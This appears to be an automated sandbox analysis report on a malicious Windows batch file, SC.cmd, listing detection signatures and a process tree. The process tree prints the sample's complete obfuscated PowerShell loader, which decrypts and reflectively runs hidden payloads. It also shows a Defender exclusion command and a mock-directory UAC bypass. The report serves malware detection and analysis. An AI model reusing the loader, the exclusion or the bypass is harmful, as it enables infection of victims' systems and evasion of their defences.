Windows
Analysis Report
SC.cmd
Overview
General Information
Detection
- Score: 100
- Range: 0 - 100
- Whitelisted: false
- Confidence: 100%
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: TrustedPath UAC Bypass Pattern
Suricata IDS alerts for network traffic
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Drops executables to the windows directory (C:\Windows) and starts them
Hides that the sample has been downloaded from the Internet (zone.identifier)
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Powershell drops PE file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious command line found
Suspicious powershell command line found
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- cmd.exe (PID: 3428 cmdline: `C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\SC.cmd" "` MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 1860 cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1` MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 2720 cmdline: `C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('t/6WxGFiWqzOYDiMeQW3vewy5Lst4QLmvh7FIz66oK8='); $aes_var.IV=[System.Convert]::FromBase64String('1xTnhp7Ji3XlXldEQfx/mg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$bNhXj=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$FyATo=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$ElTgO=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($bNhXj, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $ElTgO.CopyTo($FyATo); $ElTgO.Dispose(); $bNhXj.Dispose(); $FyATo.Dispose(); $FyATo.ToArray();}function execute_function($param_var,$param2_var){ IEX '$dVsPd=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$DUzhZ=$dVsPd.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$DUzhZ.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$EYouL = 'C:\Users\user\Desktop\SC.cmd';$host.UI.RawUI.WindowTitle = $EYouL;$tjLTM=[System.IO.File]::ReadAllText($EYouL).Split([Environment]::NewLine);foreach ($xbxfP in $tjLTM) { if ($xbxfP.StartsWith('DzoRhmGmBqXlnTxyAcGU')) { $murOL=$xbxfP.Substring(20); break; }}$payloads_var=[string[]]$murOL.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] (' ')); "` MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- powershell.exe (PID: 5432 cmdline: `"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden` MD5: 04029E121A0CFA5991749937DD22A1D9)
- powershell.exe (PID: 6360 cmdline: `"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden` MD5: 04029E121A0CFA5991749937DD22A1D9)
- powershell.exe (PID: 600 cmdline: `"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\', 'D:\')` MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 6788 cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1` MD5: 0D698AF330FD17BEE3BF90011D49251D)
- WmiPrvSE.exe (PID: 2256 cmdline: `C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding` MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
- cmd.exe (PID: 1436 cmdline: `"C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"` MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 6804 cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1` MD5: 0D698AF330FD17BEE3BF90011D49251D)
- ComputerDefaults.exe (PID: 824 cmdline: `"C:\Windows \System32\ComputerDefaults.exe"` MD5: D25A9E160E3B74EF2242023726F15416)
- cmd.exe (PID: 1900 cmdline: `"C:\Windows\System32\cmd.exe" /c rmdir "c:\Windows \"/s /q` MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 4308 cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1` MD5: 0D698AF330FD17BEE3BF90011D49251D)
- conhost.exe (PID: 6040 cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1` MD5: 0D698AF330FD17BEE3BF90011D49251D)
- svchost.exe (PID: 600 cmdline: `C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc` MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- svchost.exe (PID: 2472 cmdline: `C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS` MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
No configs have been found
Source | Rule | Description | Author | Strings
---|---|---|---|---
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems) |
Source: | Author: Florian Roth (Nextron Systems) |